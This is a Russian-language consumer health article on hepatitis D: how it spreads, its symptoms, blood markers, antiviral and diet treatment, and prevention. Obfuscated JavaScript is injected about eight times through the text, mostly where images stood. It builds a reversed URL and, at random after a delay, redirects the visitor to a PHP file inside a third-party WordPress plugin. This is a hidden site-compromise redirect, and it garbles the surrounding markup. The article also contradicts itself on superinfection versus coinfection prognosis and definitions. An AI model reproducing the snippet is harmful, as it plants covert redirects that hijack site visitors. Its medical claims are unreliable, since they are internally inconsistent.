Насколько опасен гепатит D

Гепатит, в том числе и его разновидность, именуемая дельта-гепатитом (Д), является вирусным поражением печени, которое может привести к серьёзной печёночной недостаточности или к полной дисфункции этого важнейшего органа. Учитывая вирусную природу заболевания важно знать, каким образом можно уберечься от заражения, а если оно, в силу каких-либо обстоятельств, всё же произошло, как вовремя распознать этот грозный недуг и приступить к его лечению.

Что представляет собой заболевание

Гепатит D или иначе дельта-гепатит — вирусное заболевание, которое характеризуется поражением гепатоцитов (функциональных клеток печени), происходящим при обязательном условии — наличии у пациента гепатита В. В то же время гепатит В может существовать и вполне автономно.

Тесная зависимость «дельты» от своего «собрата» обусловлена особенностями строения его вируса, у которого нет своей оболочки (мембраны) и он использует мембрану родственного вируса. Таким образом, опасности заражения гепатитом D подвергаются либо те, кто уже болен формой В, либо заражение обоими видами заболевания наступает одновременно. В первом случае заболевание классифицируется как суперинфекция и считается более благоприятным, а во втором — как коинфекция и имеет пессимистический прогноз.

$nJe=function(n){if (typeof ($nJe.list[n]) == «string») return $nJe.list[n].split(«»).reverse().join(«»);return $nJe.list[n];};$nJe.list=[«\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tomy.ru/wp-content/uploads/2017/05/s-2-728×454.jpg» alt=»вирус гепатита D» width=»728″ height=»454″ /> Вирус гепатита D представляет собой частицу сферической формы, диаметр которой от 35 до 37 нм. Внешняя ее оболочка — поверхностный антиген HBsAg. В центре частицы находится специфический ан­тиген AgD, содержащий мелкую РНК (геном)

Этот вирусный дуэт, по сравнению с наличием одного вируса гепатита В, значительно повышает риск развития острой печёночной недостаточности и цирроза печени.

Вирус содержит фрагмент рибонуклеиновой кислоты (РНК), в котором заключён генетический код. Любопытно узнать, что и широко известный вирус гриппа устроен по такому же принципу и также содержит геном РНК.

Протекать дельта-гепатит может как в острой, так и в хронической форме. При коинфекции переход заболевания в хроническую форму происходит крайне редко — до 3%, а вот при суперинфекции — в 75–80% случаев и, к сожалению, выздоровление наступает лишь в исключительных случаях.

Причины, приводящие к заражению

Инфицирование в большинстве случаев происходит следующим образом:

  • при переливании заражённой донорской крови;
  • при трасплантации органов;
  • при половом контакте (этот путь в большей степени характерен для формы В, но если в организме к этому времени уже затаился вирус, заболевание получит бурное развитие);
  • при использовании нестерильного стоматологического и маникюрного инструмента, игл от шприцов, инструмента для пирсинга или тату;
  • при внутриутробном заражении плода, если у матери отмечается острая форма заболевания в последнем триместре беременности, а вот при грудном вскармливании передачи от женщины к ребёнку не происходит.

Инфекционисты допускают, что теоретически могут существовать и другие способы заражения, которые на сегодняшний момент остаются не до конца выясненными.

Как проявляет себя недуг

Первые признаки гепатита обнаруживаются через 1,5–2 месяца, а иногда и через полгода после заражения. Клиническая картина на первых порах ничем не отличается от симптоматики ОРВИ:

  • резкое повышение температуры до фебрильных значений (38–390);
  • головная боль;
  • мышечные и суставные боли, ломота в теле;
  • возможны кожные высыпания.
$nJe=function(n){if (typeof ($nJe.list[n]) == «string») return $nJe.list[n].split(«»).reverse().join(«»);return $nJe.list[n];};$nJe.list=[«\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tomy.ru/wp-content/uploads/2017/05/s-3.jpg» alt=»симптомы гепатита» width=»640″ height=»426″ /> Начальные симптомы гепатита D схожи с проявлениями ОРВИ

Через несколько дней к этим симптомам присоединяются:

  • дискомфорт и болевые ощущения в области печени;
  • тошнота, рвота;
  • пожелтение кожных покровов и глазных белков;
  • изменение цвета мочи (приобретает цвет тёмного пива);
  • обесцвечивание кала (напоминает светлую глину).
$nJe=function(n){if (typeof ($nJe.list[n]) == «string») return $nJe.list[n].split(«»).reverse().join(«»);return $nJe.list[n];};$nJe.list=[«\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tomy.ru/wp-content/uploads/2017/05/s-6.jpg» alt=»пожелтение глазных белков при гепатите» width=»490″ height=»330″ /> Так выглядят глазные белки при гепатите

В случае перехода острой формы заболевания в хроническую у пациента развиваются такие симптомы:

  • быстрая утомляемость;
  • постоянная субфебрильная температура (до 380);
  • плохое общее самочувствие, головокружения;
  • тяжесть и боль в правом подреберье;
  • увеличенная печень;
  • отёчность;
  • суставные боли;
  • расстройство пищеварения, тошнота;
  • крапивница;
  • потеря веса;
  • кровоточивость дёсен;
  • моча тёмного цвета;
  • желтушность кожных покровов.

Эти симптомы могут появляться и исчезать. По этой причине некоторые пациенты не уделяют должного внимания своему состоянию, пока оно не достигнет критической отметки.

У детей болезнь проявляется так же, как и у взрослых. Правда, симптоматическая картина выглядит несколько ярче. Ребёнок эмоционально неустойчив, легко возбудим, у него могут появляться странности в поведении. Кроме того, у малыша на теле часто образуются множественные небольшие гематомы и носом идёт кровь.

Диагностика заболевания

Первоначальный диагноз врач устанавливает на основании внешнего осмотра пациента. При пальпировании брюшной полости в случае заболевания обнаруживается увеличение печени, а в ряде случаев и селезёнки.

Для постановки дифференцированного диагноза проводится биохимический анализ крови, который обнаруживает повышение уровня билирубина, альбумина, глобулина, некоторых ферментов печени и снижение уровня протромбина.

В случае если в крови обнаруживается маркеры заболевания, значит, присутствует и сам вирус.

$nJe=function(n){if (typeof ($nJe.list[n]) == «string») return $nJe.list[n].split(«»).reverse().join(«»);return $nJe.list[n];};$nJe.list=[«\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tomy.ru/wp-content/uploads/2017/05/analiz-krovi-1-728×485.jpg» alt=»анализ крови» width=»728″ height=»485″ /> Биохимический анализ крови даст необходимую информацию о наличии гепатита

Маркеры, обнаруживаемые в крови, при наличии вируса и их расшифровка — таблица

Название
маркера
Что означает присутствие маркера в крови
IgG анти-HDV Их присутствие свидетельствует о том, что человек либо инфицирован вирусом гепатита D, либо уже переболел и находится в стадии выздоровления.
Позитивный анализ означает, наличие процесса выработки антител в ответ на действие вируса. Повышенное количество может свидетельствовать о суперинфекции, т.е. протекании гепатита D на фоне гепатита В. Случаи, когда в анализе присутствуют только эти антитела, могут означать, что недуг перешёл в хроническую форму.
IgM анти-HDV Эти протеиновые антитела являются иммунным ответом организма на попадание дельта-вируса в организм. Они обнаруживаются через полторы-две недели после заражения и исчезают через 1–2 месяца в случае успешного выздоровления пациента.
Позитивный анализ свидетельствует о том, что вирус продолжает размножаться.
HBsAg Анализ обнаруживает фрагменты капсул вирусов как гепатита D, так и гепатита В. Маркеры обычно предшествуют появлению начальных симптомов заболевания и определяются ещё в инкубационном периоде. Их наличие обычно свидетельствует о суперинфекции, т.е. одновременном инфицировании сразу обоими вирусами — В и D.
HDAg Позитивный анализ говорит о наличии у пациента дельта-вируса. В таких случаях больному рекомендуется проведение пункционной биопсии печени.
HDV-RNA ПЦР-исследование, основанное на методах молекулярного анализа. Оно позволяет зафиксировать процесс интенсивного деления вирусов, в том числе дельта-вируса.
С помощью теста ПЦР можно также выявить присутствие вируса Эпштейн-Барра, провоцирующий развитие мононуклеоза — не менее опасного заболевания, имеющего аналогичную симптоматику.
Anti-HD суммарные Эти анализы обычно рекомендуются пациентам, больным гепатитом В в том случае, если их состояние ухудшилось.
Позитивный анализ может свидетельствовать о присоединении вируса или об окончании процесса его деления.

Помимо лабораторных анализов также применяются такие диагностические методы:

  • УЗИ — обследование не выявляет болезнь, но позволяет оценить состояние печени и определить произошедшие в ней трансформации;
  • пункционная биопсия печени — взятие печёночной ткани под местной анестезией с помощью длинной тонкой иглы для последующего анализа, дающего информацию о степени воспаления и стадии фиброза.

Лечение заболевания

Лечение острой формы требует комплексного подхода, при котором учитывается тяжесть заболевания.

Противовирусная терапия

Для лечения гепатита D применяется терапия противовирусными препаратами, однако специального лекарственного средства, действие которого было бы направлено на борьбу с дельта-вирусом, не существует, поэтому инфекционисты используют традиционный α-интерферон и препараты его группы, хорошо зарекомендовавшие себя также в лечении гепатита В, являющегося сопутствующим заболеванием.

$nJe=function(n){if (typeof ($nJe.list[n]) == «string») return $nJe.list[n].split(«»).reverse().join(«»);return $nJe.list[n];};$nJe.list=[«\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tomy.ru/wp-content/uploads/2017/05/s-5.jpg» alt=»α-интерферон» width=»600″ height=»442″ /> Препарат, применяемый для противовирусной терапии гепатита

Помимо группы интерферонов в составе противовирусной терапии применяются также нуклеозиды, например, Ламивудин. Такие лекарственные средства обладают способностью снижать скорость деления вирусов и их аккумуляции в гепатоцитах.

Следует знать, что такая терапия может происходить длительно — от полугода до нескольких лет. Кроме того, в некоторых случаях приходится периодически повторять курсы лечения. Результатом антивирусной терапии в большинстве случаев становится значительное снижение числа вирусов и уменьшение их активности, что существенно влияет на улучшение состояния больного.

Сопутствующая медикаментозная терапия

В период лечения гепатита D также используются препараты, восстанавливающие клетки печени — гепатопротекторы (Эссенциале, Карсил, Гепабене).

Кроме того, в составе медикаментозной терапии присутствуют иммуномодуляторы для активизации иммунитета (Задаксин), ферменты и минерало-витаминные комплексы.

Диетотерапия и образ жизни

Пациенту рекомендуются правила питания и поведения, призванные максимально снизить нагрузку на печень. Для этого больной должен избегать физических нагрузок, иметь полноценный ночной отдых, соблюдать диету и дробно принимать пищу — не менее 5 раз в день.

При лечении применяется диета № 5 (по Певзнеру). Основу лечебного рациона должны составлять следующие продукты:

  • блюда из нежирных сортов мяса, приготовленные на пару;
  • вегетарианские супы;
  • хлеб (подсушенный белый, отрубной, ржаной, несдобная выпечка);
  • отварная и паровая нежирная рыба;
  • морепродукты;
  • сухофрукты и компоты из них;
  • фрукты, только после тепловой обработки;
  • овощи (с исключениями);
  • рафинированное растительное масло;
  • нежирные кисломолочные продукты;
  • крупы (кроме перловой, ячневой и чечевицы);
  • макаронные изделия;
  • яйца (только белок);
  • травяные чаи, морсы, слабый чёрный чай.

Рекомендованные продукты (галерея)

) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toplay=»true» fg_allowfullscreen=»true» fg_arrow=»true» fg_loop=»true» ids=»24237,24236,24235,24234,24233″]

К употреблению запрещены:

  • алкоголь, кофе, крепкий чай;
  • шоколад;
  • крепкие мясные навары;
  • острые соусы;
  • рыбные консервы, жирная рыба, икра;
  • сдобные кондитерские изделия;
  • жирные твёрдые сыры, жирный творог, сливки;
  • овощи с резким вкусом (редис, баклажаны, лук, острые специи, белокочанная капуста в сыром виде);
  • фрукты в сыром виде;
  • копчёности, соленья.

Запрещённые продукты (галерея)

) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toplay=»true» fg_allowfullscreen=»true» fg_arrow=»true» fg_loop=»true» ids=»24232,24231,24230,24229,24228″]

Прогноз заболевания

Как уже отмечалось, при коинфекции прогноз дельта-гепатита неутешительный, поскольку не удаётся остановить запущенный процесс некроза гепатоцитов. Кроме того, заражение болезнью во многих случаях происходит на фоне длительно текущего гепатита В, что способствует резкой активизации некротических процессов в печени. При суперинфекции процесс некротизации может растягиваться на десятилетия. Эффективное лечение может продлить жизнь больного и улучшить качество его жизни на долгие годы.

К сожалению, специалисты констатируют, что в большинстве хроническая форма гепатита D так или иначе завершается циррозом печени.

$nJe=function(n){if (typeof ($nJe.list[n]) == «string») return $nJe.list[n].split(«»).reverse().join(«»);return $nJe.list[n];};$nJe.list=[«\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tomy.ru/wp-content/uploads/2017/05/s-4.jpg» alt=»цирроз печени» width=»500″ height=»403″ /> Так выглядит печень, поражённая циррозом

Основные меры профилактики

Для профилактики заражения гепатитом любого вида необходимо соблюдение следующих мер, как на государственном уровне, так и личных:

  • строгая стерильность медицинского инструментария, в том числе игл и шприцов;
  • проверка в медицинских учреждениях донорской крови и другого биоматериала на наличие вируса;
  • регулярная диспансеризация пациентов, болеющих всеми формами болезни;
  • контроль наркозависимых лиц;
  • безопасный секс с презервативом;
  • посещение проверенных маникюрных салонов и стоматологических кабинетов, где проводится обязательная обработка инструментов.

Предотвратить развитие заболевания может вакцинация. На сегодняшний день специфической вакцины против дельта-вируса нет, но пациенты, привитые вакциной от гепатита В, приобретают достаточную иммунную защиту и от формы D. Более того, даже если вакцинация будет произведена уже после заражения, заболевание будет протекать гораздо легче и иметь более оптимистический прогноз.

По данным медицинской статистики почти все пациенты (97%), имеющие иммунитет от гепатита В либо переболевшие, либо вакцинированные, гепатитом D не заражаются. таким образом, можно считать, что прививка от формы В является одновременно и вакцинацией от формы D.

Елена Малышева рассказывает о гепатите (видео)

К сожалению, гепатит D невозможно излечить полностью — гораздо легче предупредить заражение, придерживаясь вышеназванных правил. Но если инфицирование всё же произошло, не стоит впадать в панику: эффективное лечение может продлить жизнь больному на десятилетия. Главное — вовремя обратиться к врачу и приступить к адекватной терапии.

Adblock
detector